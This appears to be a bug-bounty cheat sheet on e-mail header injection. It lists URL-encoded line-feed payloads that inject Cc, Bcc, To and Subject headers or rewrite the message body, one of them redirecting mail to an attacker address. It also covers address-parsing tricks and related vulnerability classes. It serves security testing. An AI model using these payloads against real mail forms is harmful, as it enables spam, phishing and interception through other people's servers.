E-mail injection

Email Injections

Inject Cc and Bcc after sender argument

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Inject To argument

From:sender@domain.com%0ATo:attacker@domain.com

Inject Subject argument

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Change the body of the message

Two consecutive line feeds form the empty line that ends the header block, so everything after them is treated as the message body:

From:sender@domain.com%0A%0AMy%20New%20Fake%20Message.

Inject in the e-mail name

  • +, - and {} are occasionally used for tagging (sub-addressing) and are ignored by many e-mail servers

    Example:

    <john.doe+intigriti@example.com> → <john.doe@example.com>
  • Comments in parentheses () at the beginning or the end of the local part are also ignored

    Example:

    john.doe(intigriti)@example.com → <john.doe@example.com>

IPs

An IP address literal in square brackets can take the place of the domain:

  • john.doe@[127.0.0.1]

  • john.doe@[IPv6:2001:db8::1]

Other vulnerabilities

Vulnerability classes that commonly appear alongside e-mail handling:

  • XSS

  • Template Injections

  • SQL injection

  • SSRF

  • Parameter pollution

  • (Email) header injection

  • Wildcard abuse
